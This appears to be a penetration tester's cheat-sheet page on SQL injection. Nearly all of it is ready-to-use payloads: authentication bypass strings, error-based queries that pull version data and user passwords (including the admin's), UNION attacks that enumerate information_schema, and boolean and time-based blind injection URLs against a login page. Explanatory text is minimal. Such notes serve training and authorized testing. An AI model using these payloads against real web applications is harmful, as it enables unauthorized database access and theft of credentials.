💉SQL Injection

Try seclists wordlist for sql, use burpsuite intruder to test on the parameter

Basic payload to test:

'OR '' = '

Error Based Payloads

Sometimes SQL injection can lead to authentication bypass.

Something like this can be used. Try playing around by switching ' and "

whatever' OR 1=1 -- //

To enumerate version on error based SQLi

' or 1=1 in (select @@version) -- //

We can directly enumerate the database if we get output:

' OR 1=1 in (SELECT * FROM users) -- //

If we get an error try the columns one by one:

' or 1=1 in (SELECT password FROM users) -- //

To get passwords of specific user:

' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

We can find number of columns in the original query with:

' ORDER BY 1-- //

Then to do a union attack:

%' UNION SELECT database(), user(), @@version, null, null -- //

Now we can check if there are other tables in this database.

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //

Blind SQLi occurs when no database response is returned. This case we can use boolean or time based logic.

To try boolean based SQL:

http://<ip>/login.php?user=admin' AND 1=1 -- //

If both the statements are true the application will return a true value hence if we get a true value we can say admin is in the database.

To try Time based SQLi:

http://<ip>/login.php?user=admin' AND IF (1=1, sleep(3),'false') -- //

This will make the application hang if the user is present.

Last updated 4 days ago